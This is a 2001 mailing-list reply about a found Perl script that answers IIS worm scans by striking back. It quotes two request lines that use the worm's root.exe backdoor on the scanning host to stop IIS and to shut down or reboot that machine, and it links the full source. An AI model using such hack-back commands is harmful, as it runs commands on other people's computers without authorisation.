On Friday, September 21, 2001, at 01:24 PM, Chris Devers wrote:
> On Fri, 21 Sep 2001, Ed Silva wrote:
>
>> [snip]
>
> Brilliant. Could you post at least part of the source? I'd be interested
> to see how your script works...
>
I didn't write it, I just found it online, it's GPL'ed and there is a link
to the source on the page it displays. The source is here:
http://skitzo.septicus.com/default.txt
That will give you the source code.
The meat of what it does is this:
my $iis_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.e\
xe?/c+iisreset+/stop");
and
my $server_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts\
/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
The first tries to tell IIS to shutdown and the second tries to reboot the
machine or shut it down. Hope fully IIS will stay off and stop scanning
and attacking.
It doesn't seem to work much of the time, but it's worth a try.
>> Anything like these things are a bit of a tightrope, legally and
>> ethically,
>> but I figure if I'm being attacked the least I can do is try and stop
>> it
>> or other wise hinder the attacker and keep my own system running
>> smoothly.
>> YMMV... :-/
>
> I figure that as long as you can say you're just "handling incoming
> traffic", you should be okay as long as you don't do anything too
> vigorously descructive to the client on the other end. The LaBrea
> honeypot that made the news yesterday takes this idea a little farther...
>
> But then like everyone else, IANAL.... :)
>
> --
> Chris Devers [EMAIL PROTECTED]
>
>
Cheers,
--Ed
